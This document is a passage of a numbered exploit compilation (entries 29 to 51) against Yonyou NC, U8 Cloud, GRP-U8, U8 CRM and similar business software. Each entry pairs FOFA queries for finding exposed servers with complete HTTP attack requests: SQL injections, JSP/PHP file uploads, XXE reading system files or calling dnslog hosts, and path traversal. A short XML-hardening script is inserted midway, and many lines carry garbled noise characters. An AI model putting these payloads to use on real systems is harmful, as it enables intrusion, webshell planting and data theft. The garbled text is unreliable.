Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Verification: request the following path and look for the marker string in the response.
/uapim/static/pages/nc/head.jsp

+ G+ l4 M: o  q7 {( U& o29. 用友NC down/bill SQL注入
, A( i: M; T5 ~6 NFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"5 G7 o1 c6 v, W. G
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
5 c+ j( A# |* Y0 UHost: your-ip
' H- e; i" C2 Z, ^' nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 O/ N/ m- j/ L+ J% ^" a" H! Q% F3 w
Content-Type: application/x-www-form-urlencoded& z: Z5 t! p! q  I
Accept-Encoding: gzip, deflate
$ f7 s# A) G0 r+ {3 p; W$ @) R- eAccept: */*4 k1 M2 ~) Q: N  X* s
Connection: keep-alive
' f* n3 v4 L# t  Z9 F( c0 i1 t
8 z$ q7 a0 }4 ]
( F8 V3 y, i& x* X. u/ a" g30. 用友NC importPml SQL注入) z+ k9 L9 M3 J( q  v8 h9 d& Q$ O$ a8 \
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
! D$ W+ j& [/ p$ O- ?POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
+ p' U( ~/ O6 k: i4 P: ?Host: your-ip* G9 m6 [% w% \3 `! O+ Q- g
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V/ Q( T/ w( H0 ~5 Z$ N3 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
/ I: I! ~1 ?, K, V7 A0 B, j' tConnection: close6 w# G; l; T- d' J2 j
, ^* y9 ?' x6 O5 o/ l
------WebKitFormBoundaryH970hbttBhoCyj9V
; d2 _9 f1 e9 t  iContent-Disposition: form-data; name="Filedata"; filename="1.jpg"2 m. w, x1 f. c6 W2 R) j7 e0 m( G
Content-Type: image/jpeg
) O# K( k7 B6 Z------WebKitFormBoundaryH970hbttBhoCyj9V--
: \/ Y( Z+ k. w3 `2 X3 A, L
1 Q4 O8 r, M% S! k" z: U
" Y  d& `! d( h7 K7 N$ Z# E' M4 H31. 用友NC runStateServlet SQL注入
% ?$ G& \' [+ e( k) J  F9 _0 Rversion<=6.53 O* T& r" A" w. }  g
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"6 s6 n5 Q3 g* i
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
6 \- z% u+ f+ p+ z6 oHost: host2 p( x3 s3 {" s" q. _9 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
( \; c) Z9 k4 ^' Z" P; \Content-Type: application/x-www-form-urlencoded
& k7 p, F8 ^  G( H- E/ ~7 ]- X
! H4 c$ |3 W6 z0 Y" k
8 g# E! {% A  l( J9 `32. 用友NC complainbilldetail SQL注入' r2 c$ T8 }6 _; |
version= NC633、NC65
8 t! X1 e' K8 o% Y3 X+ O" Z* PFOFA:app="用友-UFIDA-NC"2 A# O* l' O8 U& i: a1 E! M8 g
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1& B2 X' ^! i" g8 J2 X
Host: your-ip% c: K( Y8 W" r' m, E% P0 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 ]3 N% f! ~) w: xContent-Type: application/x-www-form-urlencoded
+ ]4 ^! W) M- I  D8 hAccept-Encoding: gzip, deflate% a4 z/ D1 U, h2 k, D
Accept: */*
. y! D) ~5 M: h4 z) g% Q. N" kConnection: keep-alive
& x" k* J! V" ?4 X7 _. i0 X
) N/ n% L/ P, C8 `* p# r7 `  |
+ H( h& [# F* f- I# U9 b' ?/ C33. 用友NC downTax/download SQL注入
* o1 V: S  O5 W1 ?; |: \. [version:NC6.5FOFA:app="用友-UFIDA-NC"
1 F, R0 ^- N( P$ `* e$ l2 W. ?GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- D! U& \8 I  d& B+ CHost: your-ip8 W4 b) z1 e7 [! I7 n0 k6 G. o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 N# |0 Y" H( L; LContent-Type: application/x-www-form-urlencoded& t& Q; R& O+ y. T1 M
Accept-Encoding: gzip, deflate3 N) h) V# q; t, V( `, y% G8 |* k
Accept: */*0 c" x% H  A3 H& z+ d
Connection: keep-alive
: Y. F& @  i7 d/ I* i8 C: T7 i0 j/ c0 [5 I$ `
( D# M* \& f9 n) u$ A6 `
34. Yonyou NC (用友NC) warningDetailInfo endpoint SQL injection
FOFA: app="用友-UFIDA-NC"
T-SQL time-based check via the pkMessage parameter.

GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

1 A2 W# }* [6 ~3 }1 W6 O* ]& e" g35. 用友NC-Cloud importhttpscer任意文件上传& M  {, O4 d' \& x
FOFA:app="用友-NC-Cloud"2 T) ]2 n8 d- _1 L  W2 F
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
' Q( `; |- s1 A( k  SHost: 203.25.218.166:8888
- y& X  h2 Z1 q$ L1 d& GUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info3 M+ ?0 l  g% q' S" ]7 R
Accept-Encoding: gzip, deflate( T! l0 m1 A& ~/ z# D
Accept: */*. z8 `) X2 K+ R0 N$ L; `  _
Connection: close! R) L6 E, P+ Y$ a' M2 q
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
. y3 u2 m4 U3 E" k" gContent-Length: 1901 q, t. m5 h  V( G4 O
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df03 c% U- M' T2 t1 h

5 x4 ~# o! H' v2 z" a--fd28cb44e829ed1c197ec3bc71748df0
( i! F# a! j" B5 C. ~3 O. eContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
: d0 _% _4 L) l* ~8 N: I- F# z& g, l% D- M( h
<%out.println(1111*1111);%>5 U4 U. |9 l- \: `! I* s8 @8 [
--fd28cb44e829ed1c197ec3bc71748df0--
1 u% z  V# |; O1 ^; J- I1 r/ u6 b4 T. b' e# M. J+ T$ ?2 S! P

: q2 P! q) @3 i3 S6 H36. 用友NC-Cloud soapFormat XXE: p7 X! J; [1 q' D' W( |; ^3 U
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"2 @! K  O. @) w. S, I
POST /uapws/soapFormat.ajax HTTP/1.1
# Y8 S7 b+ V8 E$ k* THost: 192.168.40.130:8989
( Z4 @4 Q, o, p" @+ J5 G) HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
4 n1 e/ w9 p4 l9 A3 Q6 uContent-Length: 263
2 @  ?' c, _; K. o  \9 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: Y" X- D/ ?* ~- }! w/ _: F
Accept-Encoding: gzip, deflate
- o8 n- ]2 ~0 TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ T9 P5 P/ A( w! s8 V0 |
Connection: close
2 E' ]0 u/ Y* u7 _Content-Type: application/x-www-form-urlencoded; d: u. S. g$ J7 a5 f7 n
Upgrade-Insecure-Requests: 1
+ e- |4 G5 H8 E' k' C4 V9 ?4 J* J$ G' p4 O
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
- q7 \- {' C' ^! t9 Y- R
) Y' Z2 V" O1 `3 h/ y1 v! F4 Q3 g' ], l
37. Yonyou NC-Cloud (用友NC-Cloud) IUpdateService XXE
FOFA: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
Blind, out-of-band variant: the DTD sits inside the CDATA string that the service parses a second time. The parameter entity %aaa; fetches an external DTD from the dnslog host (which is expected to define %ccc; and %ddd;), so the HTTP or DNS request to that host is the indicator. Content-Length is from the original capture.

POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud (用友U8 Cloud) smartweb2.RPC.d XXE
FOFA: app="用友-U8-Cloud"
The __xml parameter is parsed with a DTD; the Password entity reads C:\windows\win.ini and is referenced as %26Password; (form-encoded &Password;) inside the resetPwd RPC.

POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

* W$ ~: F) b$ @. w39. 用友U8 Cloud RegisterServlet SQL注入! `  F7 p# J. a  E* }) V4 [: Z, K
FOFA:title="u8c"- q9 ^' `: {7 i3 h2 I
POST /servlet/RegisterServlet HTTP/1.1! ~* X* G- {! K
Host: 192.168.86.128:8089
6 z3 m$ R$ s$ k3 g, N8 u" kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
# n# [6 {! Z: @$ K" _8 mConnection: close
# N: A/ }+ D7 ^  L- I. q3 r, @5 g7 UContent-Length: 852 @6 S; U; T6 w! ^+ x5 G: l
Accept: */*
* g8 \% ?2 ~) ZAccept-Language: en8 I$ _$ @6 b0 n, L' {1 L$ ^7 |
Content-Type: application/x-www-form-urlencoded
5 `: w$ ]. s! |: @X-Forwarded-For: 127.0.0.1
/ H7 ]& L9 n9 sAccept-Encoding: gzip5 }% t" F5 L' I6 f  {( Y9 C2 ?- Y6 J

+ m3 T( w3 X; O, f1 a5 b% cusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--) {4 T0 G7 ~; v2 u) S* z% J" s$ n; v
( D! `0 t+ p+ X8 m9 S2 g  @2 t5 {
* Y8 ^" }& {: A' d/ J& A
40. Yonyou U8 Cloud (用友U8-Cloud) XChangeServlet XXE
FOFA: app="用友-U8-Cloud"
Out-of-band check: the request body is parsed directly as XML and the external entity fetches the dnslog URL.

POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

! x0 g# s3 {: T$ m4 t- m41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
. H+ Z' g! ~) A  G3 rFOFA:app="用友-U8-Cloud"  x& ^' j1 k# Y) }+ J% |
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
/ o2 ?' U- @5 G; r4 EHost:
- I$ {% o9 b* i4 n& i8 l7 x* _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 B9 E: n# o, F5 }. u0 A
Content-Type: application/json3 u) H* F* c* X5 S+ e0 p* y
Accept-Encoding: gzip
( z! z3 X* e2 ?- iConnection: close4 N$ X/ B# h( t# ~! \) g6 K

+ o/ ~3 u. v5 n. t% _4 L9 l( M  w. H
42. Yonyou GRP-U8 (用友GRP-U8) SmartUpload01 file upload
FOFA: app="用友-GRP-U8"
The multipart body is omitted in the source (PAYLOAD). After the upload, the written file is reached through the jatoolsreport URL below.

POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Verification URL:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 (用友GRP-U8) userInfoWeb SQL injection (leading to RCE)
FOFA: app="用友-GRP-U8"
The userId element of the getUserNameById SOAP call is concatenated into a T-SQL query; the five-second delay is the check. The source describes the issue as reaching code execution but lists only the time-based probe.

POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 (用友GRP-U8) bx_dj_check.jsp SQL injection
FOFA: app="用友-GRP-U8"
T-SQL time-based check via the djid parameter.

GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 (用友GRP-U8) ufgovbank XXE
FOFA: app="用友-GRP-U8"
Out-of-band check: reqData is parsed as XML and the external DTD reference alone (no entity needs to be expanded) makes the server fetch the dnslog URL. Content-Length is from the original capture.

POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

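Entries 36, 37, 38, 40 and 45 all come down to an XML parser that accepts a DOCTYPE from the client, and two of them hide the XML inside a form parameter (msg, __xml, reqData) so the entity reference arrives form-encoded. The following is an added example, written for this compilation and not taken from any of the products or from the original post, of the gate a defender can put in front of such a parser: refuse any document that declares a DTD or entity, and apply the same gate to XML that arrives inside form fields or inside a CDATA string that will be parsed again. The parameter names are those used in the requests above; the sample bodies are copied from them, and the benign SOAP sample is constructed.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote_plus

# Refuse the whole DTD, not just SYSTEM entities: the probes above use an
# internal entity (win.ini), a parameter entity (%aaa;) and a bare external
# DOCTYPE (ufgovbank), and none of these products' SOAP/RPC bodies needs one.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b|<!ENTITY\b", re.IGNORECASE)

# Form parameters that carry XML in the requests above:
# soapFormat.ajax -> msg, smartweb2.RPC.d -> __xml, ufgovbank -> reqData.
XML_FORM_KEYS = ("msg", "__xml", "reqData")


class DtdRejected(ValueError):
    """The document declares a DTD or an entity."""


def safe_parse(xml_text: str) -> ET.Element:
    """Parse XML only if it carries no DTD; the check is textual, so a DOCTYPE
    nested inside CDATA (entry 37) is caught before any second-stage parse."""
    if DOCTYPE_RE.search(xml_text):
        raise DtdRejected("DTD or entity declaration refused")
    return ET.fromstring(xml_text)


def classify_xml(xml_text: str) -> str:
    """'ok', 'rejected' (DTD present) or 'malformed' (not XML at all)."""
    try:
        safe_parse(xml_text)
        return "ok"
    except DtdRejected:
        return "rejected"
    except ET.ParseError:
        return "malformed"


def form_fields(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body; %26...%3b becomes &...;
    here, which is exactly why the probes encode the entity reference that way."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(key), unquote_plus(value))
    return fields


def check_form_body(body: str) -> dict:
    """Verdict per XML-bearing parameter found in a form body."""
    fields = form_fields(body)
    return {k: classify_xml(fields[k]) for k in XML_FORM_KEYS if k in fields}


# Samples copied from the request bodies above (the benign one is constructed).
SOAPFORMAT_PROBE = (
    'msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
    '<soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault>'
    '</soap:Body></soap:Envelope>%0a'
)
UFGOVBANK_PROBE = (
    'reqData=<?xml version="1.0"?>\n<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">'
    '&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest'
)
IUPDATE_PROBE = (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
    'xmlns:iup="http://update.oba.uap.nc/IUpdateService"><soapenv:Body><iup:getResult>'
    '<iup:string><![CDATA[<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM '
    '"http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]><xxx/>]]></iup:string>'
    '</iup:getResult></soapenv:Body></soapenv:Envelope>'
)
XCHANGE_PROBE = ('<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM '
                 '"http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>')
BENIGN_SOAP = ('msg=<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
               '<soap:Body/></soap:Envelope>')

if __name__ == "__main__":
    for name, body in [("soapFormat", SOAPFORMAT_PROBE), ("ufgovbank", UFGOVBANK_PROBE),
                       ("benign", BENIGN_SOAP)]:
        print(name, check_form_body(body))
    print("IUpdateService", classify_xml(IUPDATE_PROBE))
    print("XChangeServlet", classify_xml(XCHANGE_PROBE))
```

The textual gate is deliberately stricter than configuring the parser (disabling external entities still lets an internal-entity blowup through, and the IUpdateService case shows why the inner string must be checked as well). If the application must accept a DTD for a legitimate client, the remaining option is a parser with external entity resolution and DTD loading turned off, which is a per-library setting and is not shown here.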
# B3 \4 S7 z0 T3 g8 O5 o! l$ Q! h46. 用友GRP-U8 sqcxIndex.jsp SQL注入- f6 X- `* x  B; l
FOFA:app="用友-GRP-U8"0 s7 p% g% U( Y0 a
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
" N9 c4 B5 w5 R3 I; }5 iHost: your-ip: r0 L9 I) l3 n0 U. ^7 A0 `' y6 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
5 @* R$ k  w. X( a3 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 p& c2 O) s) k* }3 p' s2 i1 D
Accept-Encoding: gzip, deflate. \  |, ~0 t( y& P
Accept-Language: zh-CN,zh;q=0.9
3 ^! v& F. f+ s2 fConnection: close
9 e9 X- @/ I$ w* @. j9 O# {) ]
% s) S# g4 ^8 V! u+ t( l- t! H
" K# b: f) h' W/ j  d+ `47. 用友GRP A++Cloud 政府财务云 任意文件读取
( D; W9 T' T7 N# [6 ?5 I( GFOFA:body="/pf/portal/login/css/fonts/style.css"* j# Z& i* Q, j5 y8 M8 z
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1! _+ H8 ]0 f0 e- l
Host: x.x.x.x& @9 ~! {! k9 m
Cache-Control: max-age=0
/ _% c7 p( k! }Upgrade-Insecure-Requests: 1" z; t+ X; r8 m6 t( }1 @, h- a) x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 `) ]' S% o$ N; C! _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% j- s! w6 s" X+ Z) j
Accept-Encoding: gzip, deflate, br) h: n8 v0 G$ F; b8 z
Accept-Language: zh-CN,zh;q=0.9
, n' H) z+ H* D2 X$ fIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
: P$ U; `' ~6 b3 T0 J: d  IConnection: close
5 b" s( ]% w$ D* q3 J, w
6 z( Q$ {% X% s7 {" H1 P7 m$ ?( E# u: S

5 ^1 I/ {6 B1 t1 o7 O48. 用友U8 CRM swfupload 任意文件上传: {7 ?9 ~" l. n/ \4 i& Y. }) [( K& w8 P# J
FOFA:title="用友U8CRM"  X. {% g0 O/ \" q
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1! E/ P: M5 d3 w" M1 M9 P+ w+ o# u' M
Host: your-ip
6 h% d: b0 I  ^, qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 d6 K& I7 l% c8 @6 `, gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  w( L1 r# t$ [: bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ `+ X; F$ R% Z, H- L7 zAccept-Encoding: gzip, deflate
2 \% q( h8 n4 Q8 F4 _6 \! sContent-Type: multipart/form-data;boundary=----269520967239406871642430066855! e' \  y3 Z  h! W
------269520967239406871642430066855
6 Y1 w9 \7 j5 D; P/ R1 X+ JContent-Disposition: form-data; name="file"; filename="s.php"1 H* ^+ I9 R/ X# P! z
1231
' Q1 i! B: n( h3 ~8 d" HContent-Type: application/octet-stream
6 i7 W# M! R  l% f; A' H. s/ D! j1 Z------269520967239406871642430066855
& o- R& e0 l0 f2 p" {. S5 HContent-Disposition: form-data; name="upload"
' a, ]7 j. F& M0 f* wupload3 D) Z9 S- k( T4 r- }2 l
------269520967239406871642430066855--
& e4 }! {  c$ K8 p: L
0 c( [) }. `* Y; Z! M4 t; e8 t$ Y2 @" c1 c
49. Yonyou U8 CRM (用友U8 CRM) uploadfile.php endpoint arbitrary file upload
FOFA: body="用友U8CRM"
Same DontCheckLogin=1 bypass as entry 48. The %s in the filename is a placeholder for any name (the source is a templated probe) and the trailing space after .php is part of the probe; the server stores the file under its own temporary name, reachable at the URL listed after the request. Content-Length is from the original capture.

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Verification URL (the temporary name varies per upload):
http://x.x.x.x/tmpfile/updB3CB.tmp.php

  I; N7 v) a/ U5 f+ V50. QDocs Smart School 6.4.1 filterRecords SQL注入
6 D0 a9 K1 w) T; g6 p4 iFOFA:body="close closebtnmodal". m' [3 L2 ?8 z! g( m5 S: n
POST /course/filterRecords/ HTTP/1.1$ U- }4 M; U3 q2 f2 m& R. R, w
Host: x.x.x.x
+ @9 i3 c" U" kUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
' v1 G$ c# ]0 u# UConnection: close- q. t, p+ i9 @! r
Content-Length: 224" ?/ C5 ]% G' v" `; ~
Accept: */*7 Z) B4 l8 N" Z0 k( b, ]
Accept-Language: en; }7 h# y  V0 L+ d: W/ Q
Content-Type: application/x-www-form-urlencoded
2 ~( \$ N- f  }+ v2 tAccept-Encoding: gzip  A' Z) D$ s# q8 M

/ L6 `/ v  k  _. a9 gsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1* B2 H% E2 [' A" `( J

6 Q0 V) c/ Y) R5 q; j. v+ i  C7 ^8 r
51. Yunshikong social commerce ERP (云时空社会化商业 ERP 系统) validateLoginName SQL injection
FOFA: app="云时空社会化商业ERP系统"
Oracle time-based check (five-second DBMS_PIPE delay) via the loginName parameter.

